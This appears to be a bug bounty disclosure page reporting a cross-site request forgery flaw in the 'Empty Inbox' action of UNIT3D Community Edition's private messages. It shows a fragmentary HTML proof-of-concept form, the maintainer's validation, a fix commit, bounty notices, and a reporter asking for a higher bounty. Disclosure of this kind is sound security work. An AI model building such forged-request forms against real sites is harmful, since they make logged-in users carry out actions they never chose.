Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition


Reported on

Oct 9th 2021


There is a CSRF vulnerability on Empty Inbox in Private Messages inbox.

Proof of Concept


  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="submit" value="Submit request" />
We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back a year ago
HDVinnie validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
HDVinnie marked this as fixed with commit 63ae97 a year ago
HDVinnie has been awarded the fix bounty
This vulnerability will not receive a CVE
inbox.blade.php#L39 has been validated
a year ago


hey maintainer

can i ask you to increase the bounty please?

to join this conversation